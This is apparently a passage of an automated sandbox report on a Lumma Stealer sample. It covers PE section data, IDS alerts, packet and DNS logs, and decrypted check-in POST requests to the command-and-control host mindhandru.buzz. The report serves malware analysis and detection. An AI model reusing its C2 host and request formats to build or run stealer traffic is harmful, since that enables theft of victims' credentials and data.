                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              or ecx, dword ptr [edx]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              xor byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add dword ptr [eax+00000000h], eax
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x1ac.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              0x10000x520000x26400d3c97257bba7a26921c28f9c3482a8d0False0.9995915032679739OpenPGP Public Key7.984706196214209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rsrc0x530000x1ac0x200c4249243ceaeb236e3ce8ce2ab2c9a69False0.5390625data5.249019796122045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              0x550000x2a30000x200f6e5c3c629318e647c2a88381400f746unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              uezamyof0x2f80000x19b0000x19ae00527dc4d88bf17c4bed4282e8cb40b5f4False0.9945773596744752data7.953990333526645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              cvgltxxf0x4930000x10000x4006952ed6de1356090c48bbb4a4d1695b9False0.767578125data6.088224853241777IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .taggant0x4940000x30000x22003a37c56837ec014d2b64d3f82b5c7542False0.07479319852941177DOS executable (COM)0.7797965417131786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_MANIFEST0x530580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              kernel32.dlllstrcpy

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-27T09:00:16.122859+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849705172.67.165.185443TCP
                                                                                                              2024-12-27T09:00:16.843983+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849705172.67.165.185443TCP
                                                                                                              2024-12-27T09:00:16.843983+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849705172.67.165.185443TCP
                                                                                                              2024-12-27T09:00:18.065792+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706172.67.165.185443TCP
                                                                                                              2024-12-27T09:00:19.055605+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849706172.67.165.185443TCP
                                                                                                              2024-12-27T09:00:19.055605+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849706172.67.165.185443TCP
                                                                                                              2024-12-27T09:00:20.802751+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707172.67.165.185443TCP
                                                                                                              2024-12-27T09:00:21.686754+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849707172.67.165.185443TCP
                                                                                                              2024-12-27T09:00:23.053569+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849708172.67.165.185443TCP
                                                                                                              2024-12-27T09:00:25.371174+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849709172.67.165.185443TCP
                                                                                                              2024-12-27T09:00:27.986135+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849710172.67.165.185443TCP
                                                                                                              2024-12-27T09:00:31.192538+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849711172.67.165.185443TCP
                                                                                                              2024-12-27T09:00:31.197541+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.849711172.67.165.185443TCP
                                                                                                              2024-12-27T09:00:34.719114+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849715172.67.165.185443TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 27, 2024 09:00:14.896089077 CET49705443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:14.896120071 CET44349705172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:14.896203995 CET49705443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:14.899739027 CET49705443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:14.899751902 CET44349705172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:16.122802973 CET44349705172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:16.122859001 CET49705443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:16.125381947 CET49705443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:16.125390053 CET44349705172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:16.125631094 CET44349705172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:16.172046900 CET49705443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:16.179274082 CET49705443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:16.179316044 CET49705443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:16.179431915 CET44349705172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:16.843990088 CET44349705172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:16.844089031 CET44349705172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:16.844207048 CET49705443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:16.847062111 CET49705443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:16.847073078 CET44349705172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:16.855457067 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:16.855494022 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:16.855572939 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:16.855844975 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:16.855856895 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:18.065680027 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:18.065792084 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:18.294152021 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:18.294178009 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:18.294509888 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:18.304586887 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:18.304632902 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:18.304661036 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.055610895 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.055665016 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.055694103 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.055718899 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.055742979 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.055768967 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.055768967 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.055789948 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.055852890 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.063836098 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.072223902 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.072272062 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.072303057 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.125150919 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.125164986 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.172045946 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.175421953 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.179217100 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.179389954 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.179402113 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.218916893 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.247098923 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.250952959 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.251030922 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.251044035 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.251116037 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.251246929 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.251246929 CET49706443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.251271963 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.251276016 CET44349706172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.465624094 CET49707443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.465663910 CET44349707172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:19.465815067 CET49707443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.466109991 CET49707443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:19.466123104 CET44349707172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:20.802658081 CET44349707172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:20.802751064 CET49707443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:20.825190067 CET49707443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:20.825210094 CET44349707172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:20.825642109 CET44349707172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:20.831043959 CET49707443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:20.831321001 CET49707443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:20.831362963 CET44349707172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:21.686768055 CET44349707172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:21.686908007 CET44349707172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:21.686950922 CET49707443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:21.687048912 CET49707443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:21.687058926 CET44349707172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:21.842484951 CET49708443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:21.842529058 CET44349708172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:21.842624903 CET49708443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:21.842967987 CET49708443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:21.842982054 CET44349708172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:23.053503990 CET44349708172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:23.053569078 CET49708443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:23.055058956 CET49708443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:23.055066109 CET44349708172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:23.055320024 CET44349708172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:23.057224989 CET49708443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:23.057224989 CET49708443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:23.057260990 CET44349708172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:23.057337999 CET49708443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:23.103336096 CET44349708172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:23.871602058 CET44349708172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:23.871707916 CET44349708172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:23.871782064 CET49708443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:23.872025013 CET49708443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:23.872035980 CET44349708172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:24.067023039 CET49709443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:24.067091942 CET44349709172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:24.067164898 CET49709443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:24.067543983 CET49709443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:24.067557096 CET44349709172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:25.371052980 CET44349709172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:25.371174097 CET49709443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:25.372478008 CET49709443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:25.372487068 CET44349709172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:25.372739077 CET44349709172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:25.373991013 CET49709443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:25.374123096 CET49709443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:25.374149084 CET44349709172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:25.374203920 CET49709443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:25.374209881 CET44349709172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:26.356674910 CET44349709172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:26.356971025 CET44349709172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:26.357060909 CET49709443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:26.357130051 CET49709443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:26.357148886 CET44349709172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:26.678164005 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:26.678199053 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:26.678267002 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:26.678620100 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:26.678634882 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:27.985964060 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:27.986135006 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:27.995012999 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:27.995026112 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:27.995452881 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:27.997028112 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:27.997134924 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:27.997142076 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:29.429728985 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:29.429986000 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:29.430072069 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:29.430135965 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:29.430151939 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:29.888955116 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:29.889017105 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:29.889096022 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:29.889451981 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:29.889462948 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.192462921 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.192538023 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.194281101 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.194303036 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.194550037 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.195775986 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.196676970 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.196717024 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.196810961 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.196845055 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.196945906 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.196979046 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.197077990 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.197101116 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.197227955 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.197258949 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.197386026 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.197415113 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.197427034 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.197551966 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.197588921 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.243350029 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.243557930 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.243635893 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.243655920 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.287343979 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.287543058 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.287595987 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.287625074 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.331336021 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.331489086 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.375221014 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:31.375258923 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:31.558193922 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:33.624634027 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:33.624743938 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:33.624806881 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:33.624974012 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:33.625009060 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:33.686543941 CET49715443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:33.686592102 CET44349715172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:33.686734915 CET49715443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:33.687421083 CET49715443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:33.687433004 CET44349715172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:34.719114065 CET49715443192.168.2.8172.67.165.185

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 27, 2024 09:00:14.749433994 CET5632053192.168.2.81.1.1.1
                                                                                                              Dec 27, 2024 09:00:14.889317989 CET53563201.1.1.1192.168.2.8

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 27, 2024 09:00:14.749433994 CET192.168.2.81.1.1.10x4896Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 27, 2024 09:00:14.889317989 CET1.1.1.1192.168.2.80x4896No error (0)mindhandru.buzz172.67.165.185A (IP address)IN (0x0001)false
                                                                                                              Dec 27, 2024 09:00:14.889317989 CET1.1.1.1192.168.2.80x4896No error (0)mindhandru.buzz104.21.11.101A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • mindhandru.buzz

                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.849705172.67.165.1854437656C:\Users\user\Desktop\fer4JIJGeL.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 08:00:16 UTC262OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 8
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 08:00:16 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                              Data Ascii: act=life
                                                                                                              2024-12-27 08:00:16 UTC1121INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:00:16 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=epa6va4tdgpdkd4973gd3r9cmi; expires=Tue, 22 Apr 2025 01:46:55 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CPZ2u290Qx142OFdeaGSkHYAqN83SQcK%2FtZtAftrZIwi3ubbMoD9HDL74RbmpntGHs9WhDviXElSJ77nPRJWr76qPycVEFWrXfOUMmDSLcSJmjLMneCaY154ymUCtS0%2Fk7w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c6a67b514372-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1603&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1821584&cwnd=242&unsent_bytes=0&cid=697fd9d417fa3d7a&ts=739&x=0"
                                                                                                              2024-12-27 08:00:16 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                              Data Ascii: 2ok
                                                                                                              2024-12-27 08:00:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.849706172.67.165.1854437656C:\Users\user\Desktop\fer4JIJGeL.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 08:00:18 UTC263OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 47
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 08:00:18 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                              2024-12-27 08:00:19 UTC1131INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:00:18 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=o230dq4e2bqmpeiiivu80o3gqa; expires=Tue, 22 Apr 2025 01:46:57 GMT; Max-Age=9999999; path=/
